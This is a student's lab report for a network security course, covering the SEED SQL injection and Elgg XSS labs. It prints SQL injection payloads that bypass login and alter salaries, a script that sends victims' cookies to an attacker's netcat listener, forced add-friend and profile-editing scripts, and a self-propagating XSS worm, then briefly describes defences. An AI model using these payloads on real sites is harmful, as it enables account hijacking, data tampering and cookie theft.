20232917白胤廷 2023-2024-2 《网络攻防实践》实践十报告

20232917白胤廷 2023-2024-2 《网络攻防实践》实践十报告

1.实践内容

1.1 SEED SQL注入攻击与防御实验
本实践主要是完成针对SQL注入攻击与防御的相关实践任务，如熟悉SQL语句、利用上述Web应用存在的SQL输入漏洞，实现对SELECT语句的SQL注入攻击在不知道密码的情况下登陆该Web应用程序以及通过员工的更新个人界面实施针对UPDATE语句的SQL注入攻击，最后还进行了一些常用的SQL对抗技术，以修复上述SQL注入攻击的漏洞。

1.2 SEED XSS跨站脚本攻击实验(Elgg)
在本次实践中，先后分别进行了针对XSS跨站脚本攻击的发布恶意消息，显示警报窗口、弹窗显示cookie信息、窃取受害者的cookies并将cookie发送给攻击者以及利用XSS跨站脚本攻击实现在不用其他干预的情况下只是访问一个页面就成为受害者的朋友的功能，并同时使用相关的工具了解Elgg加好友的过程，最后还进行了使用XSS跨站脚本攻击实现在访问一个用户主页时修改受害者的信息并且更进一步编写XSS蠕虫实现上述功能并使之具备蠕虫的特性；最后，还进行了有关对抗XSS攻击的探讨。

2.实践过程

2.0 环境配置

这次实验需要使用SEEDUbuntu-16.04-32，可以通过DigitalOcean链接下载，下载后解压即可得到.vmdk文件。

在Vmware中选择“创建新的虚拟机”——“自定义”——Workstation14.x——“稍后安装操作系统”——“Linux”——“Ubuntu”——位置随意——处理器2内核1——内存2048MB——“网络地址转换”——“LSI Logic”——“SCSI”——“使用现有虚拟磁盘”——选择步骤1解压的文件中的“SEEDUbuntu-16.04-32bit.vmdk”完成创建。

开机后，点击Vmware上边栏的“虚拟机(M)”——安装Vmware Tools

在左边栏中点击DVD图标，找到其中的压缩包tar文件，将其复制到home目录下

双击压缩包并点击“Extract”进行解压，然后进入解压得到的文件夹中，鼠标右键——“Open in Terminal”，然后在终端中输入命令sudo ./vmware-install.pl，在安装过程中，遇到【Y/N】输入y，遇到其他提示直接按回车，安装结束后重启虚拟机即可完成安装。

2.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：
熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。
对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。
对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
SQL对抗：修复上述SQL注入攻击漏洞。
具体的实践过程如下：

2.1.1 熟悉SQL语句

我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

首先，我们打开虚拟机的终端，之后在终端中输入命令mysql -uroot -p登录到数据库，该数据库的密码为seedubuntu，登录过程如下图所示：

登陆成功之后，我们再通过以下命令：“use Users;”和“show tables;”切换到Users数据库并查看数据库中所有的表，使用命令select * from credential查询该表中所有的项如下图所示：

2.1.2 对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

数据表是http://www.seedlabsqlinjection.com/使用的数据，我们访问该网站，随意输入用户名和密码，网站提示如下图所示

单击“F12”——“Network”，然后刷新网页，可以发现用户名和密码通过GET请求（通过URL的传参也可以看出）提交至unsafe_home.php页面进行身份检验，如下图所示。

接下来我们使用如下命令：vim /var/www/SQLInjection/unsafe_home.php打开该网站所对应的文件

其中所使用到的SQL查询语句如下：
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’$inpu{t}_{u}name’andPassword=’$hashed_pwd’
如果我们输入的username字段为Admin‘#，Password字段为任意值；那么我们通过上述代码组合sql语句就可以得到如下的sql查询语句：
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’Admin’ #’ and Password=’$hashed_pwd’
“#”表示注释，后面的内容被注释掉，因此上述SQL查询语句也就变成了：
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’Admin’
这样一来我们就利用它不进行安全性检查的漏洞实现了SQL注入攻击；

通过这种方式，我们就可以欺骗服务器，成功登录用户主页，登录过程如下图所示：

2.1.3 对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

首先我们通过如下命令vim /var/www/SQLInjection/unsafe_edit_backend.php来查看后端的代码：

分析上述代码的SQL语句是进行SQL注入攻击的关键；
如果我们输入的nickname字段为‘， salary=’1‘ where Name=’Alice‘; # ，那么最终被构建的sql语句就将变化为：
UPDATE credential SET nickname=’‘， salary=’1‘ where Name=’Alice‘; # ’,email=’$inpu{t}_{e}mail’,address=’$input_address’, Password=’$hashe{d}_{p}wd’,PhoneNumber=’$input_phonenumber’ WHERE ID=$id;";
在上述查询语句中，改变了原本不应该改变的salary字段值；
然后我们登录Admin的个人主页，然后点击左上方的Edit Profile按钮，之后进入更新页面；
在这个页面中，为了实现SQL注入攻击，nickname字段的值我们输入为：'， salary=‘1000’ where Name=‘Alice’; #
其他地方任意输入，如下图所示：

2.1.4 SQL对抗：修复上述SQL注入攻击漏洞。

在实际工程项目中，通常使用下述方法实现对SQL注入攻击的防御：
1.使用类型安全(type-safe) 的参数编码机制;
2.凡是来自外部的用户输入，必须进行完备检查;
3.将动态SQL语句替换为存储过程、预编译SQL或ADO命令对象;
4.加强SQL数据库服务器的配置与连接.

2.2 SEED XSS跨站脚本攻击实验(Elgg)

2.2.1 发布恶意消息，显示警报窗口：

在Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看配置文件时，将执行JavaScript程序并显示一个警报窗口。

我们先用Alice的账号密码进行登录，密码为seedalice，之后我们点击左上角头像进入个人主页，点击edit profile按钮进入编辑个人信息页面之后我们往下找到Brief description并在其中插入我们的XSS攻击代码：；如下图所示：

点击保存之后我们回到个人主页就可以看到XSS的攻击效果，出现了警报窗口，如下图所示：

2.2.2 弹窗显示cookie信息：将cookie信息显示。

该实验只需将上一步实验中插入Brief description中的代码修改为：即可完成，如下图所示：

2.2.3 窃取受害者的cookies：将cookie发送给攻击者。

只需将上一步实验中插入Brief description中的代码修改为：

<script>  document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>');
</script>

开启终端并输入命令nc -l 5555 -v监听5555端口。

之后只要有用户访问Alice的主页，netcat就会接收到该用户的cookie，如图下图所示

2.2.5 成为受害者的朋友

我们以用户 Alice 的身份登录，然后访问用户 Boby 的主页

将下面的代码放入Alice用户profile的About Me中，首先编辑profile，然后单击About me最右侧的Edit HTML，在文本框中填入上述代码保存即可，然后退出Alice，使用Boby登录，如下图所示，首先确认Boby此时没有加Alice好友，然后在成员中访问Alice主页，再通过左上角返回自己的profile，即可发现已添加Alice为好友。

<script type="text/javascript">
window.onload = function () {
   var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
   var token="&__elgg_token="+elgg.security.token.__elgg_token;
   var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token;
    
   var Ajax=null;    
   Ajax=new XMLHttpRequest();
   Ajax.open("GET",sendurl,true);
   Ajax.setRequestHeader("Host","www.xsslabelgg.com");
   Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
   Ajax.send();
}
</script>

2.2.6 修改受害者的信息

将下面的代码放入Alice用户profile的About Me中，首先编辑profile，然后单击About me最右侧的Edit HTML，在文本框中填入上述代码保存即可，然后退出Alice，使用Boby登录，如下图所示，首先确认Boby的profile为空，然后在成员中访问Alice主页，再通过左上角返回自己的profile，即可发现自己的About me已经被修改。

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
    var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var aliceGuid=44;    
	if(elgg.session.user.guid!=aliceGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}
</script>

2.2.7 编写 XSS 蠕虫

将下面的代码放入Alice用户profile的About Me中，首先编辑profile，然后单击About me最右侧的Edit HTML，在文本框中填入上述代码保存即可，然后退出Alice，使用Boby登录，如下图所示，首先确认Boby的profile，然后在成员中访问Alice主页，再通过左上角返回自己的profile，即可发现自己的About me已经再次被修改。

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
 
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack again "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)
 
        var aliceGuid=44;
 
        if(elgg.session.user.guid!=aliceGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

然后退出Boby，使用Admin登录，用户名：Admin密码：seedelgg，如下图所示，首先确认Admin的profile为空，然后在成员中访问Boby主页，再通过左上角返回自己的profile，即可发现自己的About me已经被修改

2.2.8 对抗 XSS 攻击

Admin发现了XSS攻击，打开了管理页面

找到其中的Plugins，并找到插件HTMLawed并点击Activate按钮激活该插件，该插件的主要作用：对用户的输入输出进行校验并且去除特定标签。

激活后，再次查看profile页面，可以发现此时的XSS攻击已经失效，如下图所示

3.学习中遇到的问题及解决

• 问题1：环境不适配
• 问题1解决方案：如步骤2.0所写，配置所需环境

4.实践总结

本次实践内容主要集中在对SQL注入攻击以及XSS攻击的实施与防御方面；
通过本次实践，我对SQL注入攻击、XSS攻击都有了一个初步的了解，对XSS蠕虫的编写也有了一个初步的认识；
初步学习web网络攻防，使我对网络攻击与防御技术有了一个更加深入的了解。